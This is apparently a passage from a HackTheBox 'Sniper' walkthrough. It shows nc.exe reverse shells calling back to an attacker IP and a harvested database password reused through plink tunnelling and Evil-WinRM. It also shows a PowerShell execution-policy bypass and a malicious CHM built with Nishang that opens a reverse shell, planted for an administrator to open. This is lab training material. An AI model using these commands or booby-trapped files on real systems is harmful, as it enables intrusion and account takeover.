<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">C:\payas0\nc.exe <span class="number">10.10</span><span class="number">.14</span><span class="number">.216</span> <span class="number">9001</span> -e powershell.exe</span><br></pre></td></tr></table></figure>

<p><img src="/img/sniper/sniper-nc.png" alt="HackTheBox-Sniper/sniper-nc.png" title="Sniper RFI"></p>
<p>after executing this I have an initial shell ;)</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sniper via 🐘 v7<span class="number">.3</span><span class="number">.15</span> </span><br><span class="line">❯ nc -lnvp <span class="number">9001</span></span><br><span class="line">listening <span class="keyword">on</span> [any] <span class="number">9001</span> ...</span><br><span class="line">connect to [<span class="number">10.10</span><span class="number">.14</span><span class="number">.216</span>] <span class="keyword">from</span> (UNKNOWN) [<span class="number">10.10</span><span class="number">.10</span><span class="number">.151</span>] <span class="number">50340</span></span><br><span class="line">Windows PowerShell </span><br><span class="line">Copyright (C) Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">PS C:\payas0&gt; whoami </span><br><span class="line">whoami</span><br><span class="line">nt authority\iusr</span><br><span class="line">PS C:\payas0&gt; hostname</span><br><span class="line">hostname</span><br><span class="line">Sniper</span><br><span class="line">PS C:\payas0&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Enumerating-SNIPER-machine"><a href="#Enumerating-SNIPER-machine" class="headerlink" title="Enumerating SNIPER machine"></a>Enumerating SNIPER machine</h3><p>I start another enumeration, so first thing I did is to look who’s user inside with powershell command <code>Get-WmiObject -Class Win32_UserAccount</code> so:</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">PS C:\payas0&gt; Get-WmiObject -Class Win32_UserAccount</span><br><span class="line">Get-WmiObject -Class Win32_UserAccount                                                                                                          </span><br><span class="line">                                                                                                                                                </span><br><span class="line">                                                                                                                                                </span><br><span class="line">AccountType : <span class="number">512</span>                                                                                                                               </span><br><span class="line">Caption     : SNIPER\Administrator                                                                                                              </span><br><span class="line">Domain      : SNIPER                                                                                                                                        </span><br><span class="line">SID         : S<span class="number">-1</span><span class="number">-5</span><span class="number">-21</span><span class="number">-3952461944</span><span class="number">-2550723483</span><span class="number">-3555184078</span><span class="number">-500</span>                                                                                                               </span><br><span class="line">FullName    :                                                                                                                                                             </span><br><span class="line">Name        : Administrator                                                                                                                                               </span><br><span class="line">                                                                                                                                                                          </span><br><span class="line">AccountType : <span class="number">512</span>                                                                                                                                                                          </span><br><span class="line">Caption     : SNIPER\Chris                                                                                                                                                                 </span><br><span class="line">Domain      : SNIPER                                                                                                                                                                       </span><br><span class="line">SID         : S<span class="number">-1</span><span class="number">-5</span><span class="number">-21</span><span class="number">-3952461944</span><span class="number">-2550723483</span><span class="number">-3555184078</span><span class="number">-1000</span>                                                                                                                               </span><br><span class="line">FullName    :                                                                                                                                                                              </span><br><span class="line">Name        : Chris                                                                                                                                                                        </span><br><span class="line">                                                                                                                                                                                           </span><br><span class="line">AccountType : <span class="number">512</span></span><br><span class="line">Caption     : SNIPER\DefaultAccount</span><br><span class="line">Domain      : SNIPER</span><br><span class="line">SID         : S<span class="number">-1</span><span class="number">-5</span><span class="number">-21</span><span class="number">-3952461944</span><span class="number">-2550723483</span><span class="number">-3555184078</span><span class="number">-503</span></span><br><span class="line">FullName    : </span><br><span class="line">Name        : DefaultAccount</span><br><span class="line"></span><br><span class="line">AccountType : <span class="number">512</span></span><br><span class="line">Caption     : SNIPER\Guest</span><br><span class="line">Domain      : SNIPER</span><br><span class="line">SID         : S<span class="number">-1</span><span class="number">-5</span><span class="number">-21</span><span class="number">-3952461944</span><span class="number">-2550723483</span><span class="number">-3555184078</span><span class="number">-501</span></span><br><span class="line">FullName    : </span><br><span class="line">Name        : Guest</span><br><span class="line"></span><br><span class="line">AccountType : <span class="number">512</span></span><br><span class="line">Caption     : SNIPER\WDAGUtilityAccount</span><br><span class="line">Domain      : SNIPER</span><br><span class="line">SID         : S<span class="number">-1</span><span class="number">-5</span><span class="number">-21</span><span class="number">-3952461944</span><span class="number">-2550723483</span><span class="number">-3555184078</span><span class="number">-504</span></span><br><span class="line">FullName    : </span><br><span class="line">Name        : WDAGUtilityAccount</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PS C:\payas0&gt;</span><br></pre></td></tr></table></figure>

<p>So I’ve got <strong><em>USER</em></strong> named – <code>Chris</code> and I try to checked the access right of that account with <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/access.hk" target="_blank" rel="noopener">Access checked</a> so</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">PS C:\accesschk.exe -uwqs Users C:\*.* /accepteula</span><br><span class="line">c:\payas0\accesschk.exe -uwqs Users C:\*.* /accepteula</span><br><span class="line"></span><br><span class="line">Accesschk v6<span class="number">.12</span> - Reports effective permissions <span class="keyword">for</span> securable objects</span><br><span class="line">Copyright (C) <span class="number">2006</span><span class="number">-2017</span> Mark Russinovich</span><br><span class="line">Sysinternals - www.sysinternals.com</span><br><span class="line"></span><br><span class="line">RW C:\$Recycle.Bin</span><br><span class="line">RW C:\Microsoft</span><br><span class="line">RW C:\payas0</span><br><span class="line">RW C:\ProgramData</span><br><span class="line">RW C:\Temp</span><br><span class="line">RW C:\Microsoft\Windows</span><br><span class="line">RW C:\Microsoft\Windows\Powershell</span><br><span class="line">RW C:\payas0\Microsoft</span><br><span class="line">RW C:\payas0\Microsoft\Windows</span><br><span class="line">RW C:\payas0\Microsoft\Windows\Powershell</span><br><span class="line">RW C:\ProgramData\Data</span><br><span class="line">RW C:\ProgramData\MySQL</span><br><span class="line">RW C:\ProgramData\USOShared</span><br><span class="line">RW C:\ProgramData\VMWare</span><br><span class="line">RW C:\ProgramData\Data\<span class="meta">#innodb_temp</span></span><br><span class="line">RW C:\ProgramData\Data\mysql</span><br><span class="line">RW C:\ProgramData\Data\</span><br><span class="line">RW C:\ProgramData\Data\perfomance_schema</span><br><span class="line">RW C:\ProgramData\Data\sniper</span><br><span class="line">RW C:\ProgramData\Data\sys</span><br><span class="line">RW C:\ProgramData\Microsoft\DeviceSync</span><br><span class="line">RW C:\ProgramData\Microsoft\User Account Pictures</span><br><span class="line">RW C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys</span><br><span class="line">RW C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys</span><br><span class="line">RW C:\ProgramData\Microsoft\DRM\Server</span><br><span class="line">RW C:\ProgramData\Microsoft\NetFramework\Breadcrumbstore</span><br><span class="line">RW C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache</span><br><span class="line">RW C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\downloads</span><br><span class="line">RW C:\ProgramData\Microsoft\WinMSIPC\Server</span><br></pre></td></tr></table></figure>

<p>Second I visit the <code>inetpub</code> directory where the website is installed and the source code. and I’m lucky i see interesting file at <code>C:\inetpub\wwwroot\user\db.php</code> which contain user credentials.</p>
<p><img src="/img/sniper/sniper-dbphp.png" alt="HackTheBox-Sniper/sniper-dbphp.png" title="Sniper dbuser.php"></p>
<p>The DB connection String was found at the db.php was confirmed that the creds is owned by user <strong><em><code>Chris</code></em></strong></p>
<hr>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><h3 id="Privilege-Escalation-for-user-CHRIS"><a href="#Privilege-Escalation-for-user-CHRIS" class="headerlink" title="Privilege Escalation for user CHRIS"></a>Privilege Escalation for user CHRIS</h3><h3 id="Method-1"><a href="#Method-1" class="headerlink" title="Method #1"></a>Method #1</h3><p>I was thinking if I can use that creds in <code>Evil-WinRM protocol</code> <strong><em>(netstat -ano)</em></strong> and get the <code>user.txt</code></p>
<p><img src="/img/sniper/sniper-netstat.png" alt="HackTheBox-Sniper/sniper-netstat.png" title="Sniper listening ports"></p>
<p>We can use port <code>5985</code> to create the <code>Port Forwarding</code> method and login as <code>Chris</code> but before i do that I uploaded <code>plink.exe</code> windows binary to Sniper and create a tunnel so I can access that port from my machine so:</p>
<figure class="highlight applescript"><table><tr><td class="code"><pre><span class="line"><span class="comment"># powershell</span></span><br><span class="line"></span><br><span class="line">PS C:\payas0&gt; .\plink.exe -l nulldev -pw nulldev -R <span class="number">5985</span>:<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">5985</span> <span class="number">10.10</span><span class="number">.14</span><span class="number">.216</span></span><br><span class="line">.\plink.exe -l nulldev -pw nulldev -R <span class="number">5985</span>:<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">5985</span> <span class="number">10.10</span><span class="number">.14</span><span class="number">.216</span></span><br><span class="line">The server's host key <span class="keyword">is</span> <span class="keyword">not</span> cached <span class="keyword">in</span> <span class="keyword">the</span> registry. You</span><br><span class="line">have no guarantee <span class="keyword">that</span> <span class="keyword">the</span> server <span class="keyword">is</span> <span class="keyword">the</span> computer you</span><br><span class="line">think <span class="keyword">it</span> <span class="keyword">is</span>.</span><br><span class="line">The server's rsa2 key fingerprint <span class="keyword">is</span>:</span><br><span class="line">ssh-rsa <span class="number">2048</span> <span class="number">81</span>:c9:<span class="number">32</span>:<span class="number">5</span>d:<span class="number">2</span>e:<span class="number">03</span>:<span class="number">3</span>c:<span class="number">1</span>d:<span class="number">72</span>:<span class="number">8</span>a:<span class="number">54</span>:<span class="number">45</span>:ed:<span class="number">0</span>b:<span class="number">08</span>:<span class="number">4</span>b</span><br><span class="line">If you trust this host, enter <span class="string">"y"</span> <span class="keyword">to</span> add <span class="keyword">the</span> key <span class="keyword">to</span></span><br><span class="line">PuTTY's cache <span class="keyword">and</span> carry <span class="keyword">on</span> connecting.</span><br><span class="line">If you want <span class="keyword">to</span> carry <span class="keyword">on</span> connecting just once, <span class="keyword">without</span></span><br><span class="line">adding <span class="keyword">the</span> key <span class="keyword">to</span> <span class="keyword">the</span> cache, enter <span class="string">"n"</span>.</span><br><span class="line">If you do <span class="keyword">not</span> trust this host, press Return <span class="keyword">to</span> abandon <span class="keyword">the</span></span><br><span class="line">connection.</span><br><span class="line">Store key <span class="keyword">in</span> cache? (y/n) y</span><br><span class="line">Linux Payas0 <span class="number">5.4</span><span class="number">.0</span>-kali2-amd64 <span class="comment">#1 SMP Debian 5.4.8-1kali1 (2020-01-06) x86_64</span></span><br><span class="line"></span><br><span class="line">The programs included <span class="keyword">with</span> <span class="keyword">the</span> Kali GNU/Linux system are free software;</span><br><span class="line"><span class="keyword">the</span> exact distribution terms <span class="keyword">for</span> each program are described <span class="keyword">in</span> <span class="keyword">the</span></span><br><span class="line">individual files <span class="keyword">in</span> /usr/share/doc/*/copyright.</span><br><span class="line"></span><br><span class="line">Kali GNU/Linux comes <span class="keyword">with</span> ABSOLUTELY NO WARRANTY, <span class="keyword">to</span> <span class="keyword">the</span> extent</span><br><span class="line">permitted <span class="keyword">by</span> applicable law.</span><br><span class="line">Last login: Sat Mar <span class="number">28</span> <span class="number">05</span>:<span class="number">30</span>:<span class="number">42</span> <span class="number">2020</span> <span class="keyword">from</span> <span class="number">10.10</span><span class="number">.10</span><span class="number">.151</span></span><br><span class="line">Could <span class="keyword">not</span> chdir <span class="keyword">to</span> home directory /home/nulldev: No such <span class="built_in">file</span> <span class="keyword">or</span> directory</span><br><span class="line"></span><br><span class="line">$ whoami</span><br><span class="line">whoami</span><br><span class="line">nulldev</span><br><span class="line">$ su root</span><br><span class="line">Password: <span class="string">"------------"</span></span><br><span class="line"></span><br><span class="line">nulldev <span class="keyword">on</span> Payas0</span><br><span class="line">❯</span><br></pre></td></tr></table></figure>

<p>Now that the tunnel is created, I will try to login as user <code>Chris</code> using dbuser password and get the <code>user.txt</code></p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">nulldev <span class="keyword">on</span> Payas0 <span class="keyword">in</span> evil-winrm <span class="keyword">on</span>  master via 💎 v2<span class="number">.5</span><span class="number">.7</span> </span><br><span class="line">❯ ruby evil-winrm.rb -i <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> -u Chris -p <span class="string">'36mEAhz/B8xQ~2VM'</span> -s ./ -e ./    </span><br><span class="line">ruby evil-winrm.rb -i <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> -u Chris -p <span class="string">'36mEAhz/B8xQ~2VM'</span> -s ./ -e ./</span><br><span class="line"></span><br><span class="line">Evil-WinRM shell v2<span class="number">.3</span></span><br><span class="line"></span><br><span class="line">Info: Establishing connection to remote endpoint</span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users\Chris\Documents&gt; cd ..</span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users&gt; dir</span><br><span class="line">dir</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\Users</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name</span><br><span class="line">----                -------------         ------ ----</span><br><span class="line">d-----         <span class="number">4</span>/<span class="number">9</span>/<span class="number">2019</span>   <span class="number">6</span>:<span class="number">47</span> AM                Administrator</span><br><span class="line">d-----        <span class="number">4</span>/<span class="number">11</span>/<span class="number">2019</span>   <span class="number">7</span>:<span class="number">04</span> AM                Chris</span><br><span class="line">d-r---         <span class="number">4</span>/<span class="number">9</span>/<span class="number">2019</span>   <span class="number">6</span>:<span class="number">47</span> AM                Public</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users&gt; cd Chris\Desktop</span><br><span class="line">cd Chris\Desktop</span><br><span class="line">*Evil-WinRM* PS C:\Users\Chris\Desktop&gt; dir</span><br><span class="line">dir</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\Users\Chris\Desktop</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name</span><br><span class="line">----                -------------         ------ ----</span><br><span class="line">-a----        <span class="number">4</span>/<span class="number">11</span>/<span class="number">2019</span>   <span class="number">8</span>:<span class="number">15</span> AM             <span class="number">32</span> user.txt</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users\Chris\Desktop&gt; more user.txt</span><br><span class="line">more user.txt</span><br><span class="line"><span class="number">21f</span>4[----------------------]cf56e</span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users\Chris\Desktop&gt;</span><br></pre></td></tr></table></figure>

<hr>
<h3 id="Method-2"><a href="#Method-2" class="headerlink" title="Method #2"></a>Method #2</h3><p>Yes there’s a method #2 to get <code>user.txt</code> and this is less hassle than doing port forwarding with powershell but first I will give permission my payas0 folder then setup netcat listener in my Kali <code>nc -lnvp 4444</code> so:</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">PS C:\inetpub\wwwroot\user&gt; icacls <span class="string">"C:\payas0"</span> /grant iusr:F  </span><br><span class="line">icacls <span class="string">"C:\payas0"</span> /grant iusr:F</span><br><span class="line">processed file: C:\payas0</span><br><span class="line">Successfully processed <span class="number">1</span> files; Failed processing <span class="number">0</span> files</span><br></pre></td></tr></table></figure>
<p>then do script.</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">$user = <span class="string">"SNIPER\\Chris"</span></span><br><span class="line"></span><br><span class="line">$password = <span class="string">"36mEAhz/B8xQ~2VM"</span></span><br><span class="line"></span><br><span class="line">$securePassword = ConvertTo-SecureString $password -AsPlainText -Force</span><br><span class="line"></span><br><span class="line">$credential = New-Object</span><br><span class="line"></span><br><span class="line">$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword</span><br><span class="line"></span><br><span class="line">Invoke-Command -ComputerName SNIPER -Credential $credential -ScriptBlock &#123; C:\payas0\nc.exe -e cmd.exe <span class="number">10.10</span><span class="number">.14</span><span class="number">.216</span> <span class="number">4444</span>&#125;</span><br></pre></td></tr></table></figure>

<p>After executing the last command I have now again the shell (2nd shell) and this was look better.</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">root <span class="keyword">in</span> htb/boxes/Sniper via 🐘 v7<span class="number">.3</span><span class="number">.15</span> </span><br><span class="line">❯ nc -lnvp <span class="number">4444</span></span><br><span class="line">listening <span class="keyword">on</span> [any] <span class="number">4444</span> ...</span><br><span class="line">connect to [<span class="number">10.10</span><span class="number">.14</span><span class="number">.216</span>] <span class="keyword">from</span> (UNKNOWN) [<span class="number">10.10</span><span class="number">.10</span><span class="number">.151</span>] <span class="number">49835</span></span><br><span class="line">Microsoft Windows [Version <span class="number">10.0</span><span class="number">.17763</span><span class="number">.678</span>]</span><br><span class="line">(c) <span class="number">2018</span> Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">C:\Users\Chris\Documents&gt;whoami &amp; hostname</span><br><span class="line">whoami &amp; hostname</span><br><span class="line">sniper\chris</span><br><span class="line">Sniper</span><br><span class="line"></span><br><span class="line">C:\Users\Chris\Documents&gt;</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h2><p>Enumeration begins again’ but this was pretty easy as the the stuffs I needed is all in the basic folder directories.<br>Going at <code>C:\Docs</code> directory there’s a note.txt leave by our “Boss” says.</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">C:\Users\Chris\Desktop&gt;cd \Docs                                                                                                                 </span><br><span class="line">cd \Docs                                                                                                                                                    </span><br><span class="line">                                                                                                                                                                          </span><br><span class="line">C:\Docs&gt;dir                                                                                                                                                               </span><br><span class="line">dir                                                                                                                                                                       </span><br><span class="line"> Volume <span class="keyword">in</span> drive C has no label.                                                                                                                                          </span><br><span class="line"> Volume Serial Number <span class="keyword">is</span> <span class="number">6</span>A2B<span class="number">-2640</span></span><br><span class="line"></span><br><span class="line"> Directory of C:\Docs</span><br><span class="line"></span><br><span class="line"><span class="number">03</span>/<span class="number">28</span>/<span class="number">2020</span>  <span class="number">12</span>:<span class="number">46</span> AM    &lt;DIR&gt;          .</span><br><span class="line"><span class="number">03</span>/<span class="number">28</span>/<span class="number">2020</span>  <span class="number">12</span>:<span class="number">46</span> AM    &lt;DIR&gt;          ..</span><br><span class="line"><span class="number">04</span>/<span class="number">11</span>/<span class="number">2019</span>  <span class="number">09</span>:<span class="number">31</span> AM               <span class="number">285</span> note.txt</span><br><span class="line"><span class="number">04</span>/<span class="number">11</span>/<span class="number">2019</span>  <span class="number">09</span>:<span class="number">17</span> AM           <span class="number">552</span>,<span class="number">607</span> php <span class="keyword">for</span> dummies-trial.pdf</span><br><span class="line">               <span class="number">2</span> File(s)        <span class="number">552</span>,<span class="number">892</span> bytes</span><br><span class="line">               <span class="number">2</span> Dir(s)  <span class="number">17</span>,<span class="number">953</span>,<span class="number">026</span>,<span class="number">048</span> bytes free</span><br></pre></td></tr></table></figure>

<h3 id="Note-txt"><a href="#Note-txt" class="headerlink" title="Note.txt"></a>Note.txt</h3><p>What’s on the <code>note.txt</code> ? Well this:</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">C:\Docs&gt;more note.txt</span><br><span class="line">more note.txt</span><br><span class="line">Hi Chris,</span><br><span class="line">        Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website <span class="keyword">as</span> there are a lot of bugs <span class="keyword">on</span> it. And I hope that you<span class="string">'ve prepared the documentation for our new app. Drop it here when you'</span>re done with it.</span><br><span class="line"></span><br><span class="line">Regards,</span><br><span class="line">Sniper CEO.</span><br><span class="line"></span><br><span class="line">C:\Docs&gt;</span><br></pre></td></tr></table></figure>

<p>So hints is on the note ⇒ <code>&quot;The documentaion for the new app, then I will drop it here when I&#39;m done with it.&quot;</code> So there’s a file here here which the Administrator will checked and open it.</p>
<h3 id="CHM-File"><a href="#CHM-File" class="headerlink" title="CHM File"></a>CHM File</h3><p>Next, in the <code>C:\Users\Chris\Downloads</code> directory there’s a <code>CHM</code> file.</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">C:\Docs&gt;cd \Users\Chris\Downloads</span><br><span class="line">cd \Users\Chris\Downloads</span><br><span class="line"></span><br><span class="line">C:\Users\Chris\Downloads\dir</span><br><span class="line">dir</span><br><span class="line">  Volume <span class="keyword">in</span> drive C has no label.</span><br><span class="line">  Volume Serial Number <span class="keyword">is</span> <span class="number">6</span>A2B<span class="number">-2640</span></span><br><span class="line"></span><br><span class="line">  Directory of C:\Users\Chris\Downloads</span><br><span class="line"></span><br><span class="line"><span class="number">03</span>/<span class="number">27</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">46</span> PM &lt;DIR&gt;               .</span><br><span class="line"><span class="number">03</span>/<span class="number">27</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">46</span> PM &lt;DIR&gt;               ..</span><br><span class="line"><span class="number">03</span>/<span class="number">27</span>/<span class="number">2020</span>  <span class="number">11</span>:<span class="number">46</span> PM                 <span class="number">281</span> a.html</span><br><span class="line"><span class="number">04</span>/<span class="number">11</span>/<span class="number">2019</span>  <span class="number">08</span>:<span class="number">36</span> AM              <span class="number">10</span>,<span class="number">462</span> instructions.chm</span><br><span class="line">               <span class="number">2</span> File(s)           <span class="number">10</span>,<span class="number">743</span> bytes</span><br><span class="line">               <span class="number">2</span> Dir(s)    <span class="number">17</span>,<span class="number">945</span>,<span class="number">899</span>,<span class="number">008</span> bytes free</span><br><span class="line"></span><br><span class="line">C:\Users\Chris\Downloads&gt;</span><br></pre></td></tr></table></figure>

<h3 id="Generate-Malicious-CHM-File"><a href="#Generate-Malicious-CHM-File" class="headerlink" title="Generate Malicious CHM File"></a>Generate Malicious CHM File</h3><p>To view the chm file, you need to open it with Windows, so I transferred the chm file to my Windows machine, and it is<br>precisely the documentation for the app, requested by the Sniper CEO:</p>
<p>Administrator will checked <code>CHM</code> and open it then the payload will triggered.</p>
<p><img src="/img/sniper/instructions1.png" alt="HackTheBox-Sniper/sniper-instructions1.png" title="Sniper Instructions"></p>
<p>This one is new to me I have never had anything to do with CHM files’ so I did some research about <code>CHM File</code> and I found that you can create a malicious <code>CHM File</code> with <a href="https://github.com/samratashok/nishang" target="_blank" rel="noopener">Nishang</a> and use the <a href="https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1" target="_blank" rel="noopener">Out-CHM.ps1</a>.</p>
<p>I try to download first the <code>Out-CHM.ps1</code> in my Windows but it rejected because it is considered as a virus’. Well creating a malicious <code>CHM File</code> was fuck me’ as my Windows always deny it even i disable my windows security for a while, Powershell will always reject it.</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">PS C:\Users\Medz\Documents\sniper&gt; import-module Out-CHM.ps1</span><br><span class="line">..\Out-CHM.ps1 : The term <span class="string">'Out-CHM.ps1'</span> <span class="keyword">is</span> not recognized <span class="keyword">as</span> the name of a cmdlet, function, script file, or</span><br><span class="line">operable program. Check the spelling of the name, or <span class="keyword">if</span> a path was included, verify that the path <span class="keyword">is</span> correct and <span class="keyword">try</span></span><br><span class="line">again.</span><br><span class="line">At line:<span class="number">1</span> <span class="keyword">char</span>:<span class="number">1</span></span><br><span class="line">+ ..\Out-CHM.ps1</span><br><span class="line">+ ~~~~~~~~~~~~~~</span><br><span class="line">    + CategoryInfo          : ObjectNotFound: (Out-CHM.ps1:String) [], CommandNotFoundException</span><br><span class="line">    + FullyQualifiedErrorId : CommandNotFoundException</span><br><span class="line"></span><br><span class="line">PS C:\Users\Medz\Documents\sniper&gt;</span><br></pre></td></tr></table></figure>

<p>but I managed it too using <code>powershell -ep bypass</code></p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">PS C:\Users\Medz\Documents\sniper&gt; powershell -ep bypass</span><br><span class="line">Windows PowerShell</span><br><span class="line">Copyright (C) Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">Try the <span class="keyword">new</span> cross-platform PowerShell https:<span class="comment">//aka.ms/pscore6</span></span><br><span class="line"></span><br><span class="line">PS C:\Users\Medz\Documents\sniper&gt;</span><br></pre></td></tr></table></figure>

<p>Now before generate a <code>CHM</code> file we need to download this first <a href="https://www.microsoft.com/en-us/download/details.aspx?id=21138" target="_blank" rel="noopener">HTML Help Workshop</a> from Microsoft and choose <code>htmlhelp.exe</code> (run/install it). This will create the folder C:\Program Files (x86)\HTML Help<br>Workshop with the needed programs to create the malicious .chm file.</p>
<p>and Finally, I can now create <code>CHM</code> file.</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">PS C:\Users\Medz\Documents\sniper&gt; import-module .\Out-CHM.ps1</span><br><span class="line">PS C:\Users\Medz\Documents\sniper&gt; Out-CHM -Payload <span class="string">"C:\payas0\nc.exe 10.10.14.216 1234 -e cmd.exe"</span> -HHCPath <span class="string">"C:\Program Files (x86)\HTML Help Workshop"</span></span><br><span class="line">Microsoft HTML Help Compiler <span class="number">4.74</span><span class="number">.8702</span></span><br><span class="line"></span><br><span class="line">Compiling c:\Users\Medz\Documents\sniper\doc.chm</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Compile time: <span class="number">0</span> minutes, <span class="number">0</span> seconds</span><br><span class="line"><span class="number">2</span>       Topics</span><br><span class="line"><span class="number">4</span>       Local links</span><br><span class="line"><span class="number">4</span>       Internet links</span><br><span class="line"><span class="number">0</span>       Graphics</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Created c:\Users\Medz\Documents\sniper\doc.chm, <span class="number">13</span>,<span class="number">448</span> bytes</span><br><span class="line">Compression increased file <span class="keyword">by</span> <span class="number">280</span> bytes.</span><br><span class="line">PS C:\Users\Medz\Documents\sniper&gt; dir</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\Users\Medz\Documents\sniper</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name</span><br><span class="line">----                -------------         ------ ----</span><br><span class="line">d-----        <span class="number">6</span>/<span class="number">30</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">58</span> PM                Basic Linux Privilege Escalation_files</span><br><span class="line">-a----        <span class="number">6</span>/<span class="number">30</span>/<span class="number">2019</span>  <span class="number">10</span>:<span class="number">58</span> PM          <span class="number">56717</span> Basic Linux Privilege Escalation.html</span><br><span class="line">-a----        <span class="number">3</span>/<span class="number">29</span>/<span class="number">2020</span>   <span class="number">3</span>:<span class="number">20</span> AM          <span class="number">13448</span> doc.chm</span><br><span class="line">-a----        <span class="number">3</span>/<span class="number">29</span>/<span class="number">2020</span>   <span class="number">3</span>:<span class="number">05</span> AM          <span class="number">19502</span> Out-CHM.ps1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PS C:\Users\Medz\Documents\sniper&gt;</span><br></pre></td></tr></table></figure>

<h2 id="Gain-the-Administrator-Shell"><a href="#Gain-the-Administrator-Shell" class="headerlink" title="Gain the Administrator Shell"></a>Gain the Administrator Shell</h2><p>So it’s done ! Now I will upload <code>doc.chm</code> in <code>C:\Docs</code> directory of SNIPER machine.</p>
<figure class="highlight c#"><table><tr><td class="code"><pre><span class="line"><span class="meta"># powershell</span></span><br><span class="line"></span><br><span class="line">C:\Docs&gt;dir</span><br><span class="line">dir</span><br><span class="line"> Volume <span class="keyword">in</span> drive C has no label.</span><br><span class="line"> Volume Serial Number <span class="keyword">is</span> <span class="number">6</span>A2B<span class="number">-2640</span></span><br><span class="line"></span><br><span class="line"> Directory of C:\Docs</span><br><span class="line"></span><br><span class="line"><span class="number">03</span>/<span class="number">28</span>/<span class="number">2020</span>  <span class="number">07</span>:<span class="number">19</span> PM    &lt;DIR&gt;          .</span><br><span class="line"><span class="number">03</span>/<span class="number">28</span>/<span class="number">2020</span>  <span class="number">07</span>:<span class="number">19</span> PM    &lt;DIR&gt;          ..</span><br><span class="line"><span class="number">04</span>/<span class="number">11</span>/<span class="number">2019</span>  <span class="number">09</span>:<span class="number">31</span> AM               <span class="number">285</span> note.txt</span><br><span class="line"><span class="number">04</span>/<span class="number">11</span>/<span class="number">2019</span>  <span class="number">09</span>:<span class="number">17</span> AM           <span class="number">552</span>,<span class="number">607</span> php <span class="keyword">for</span> dummies-trial.pdf</span><br><span class="line">               <span class="number">2</span> File(s)        <span class="number">552</span>,<span class="number">892</span> bytes</span><br><span class="line">               <span class="number">2</span> Dir(s)  <span class="number">17</span>,<span class="number">987</span>,<span class="number">465</span>,<span class="number">216</span> bytes free</span><br><span class="line"></span><br><span class="line">C:\Docs&gt;copy \\<span class="number">10.10</span><span class="number">.15</span><span class="number">.33</span>\medz\doc.chm .</span><br><span class="line">copy \\<span class="number">10.10</span><span class="number">.15</span><span class="number">.33</span>\medz\doc.chm .</span><br><span class="line">        <span class="number">1</span> file(s) copied.</span><br><span class="line"></span><br><span class="line">C:\Docs&gt;</span><br></pre></td></tr></table></figure>

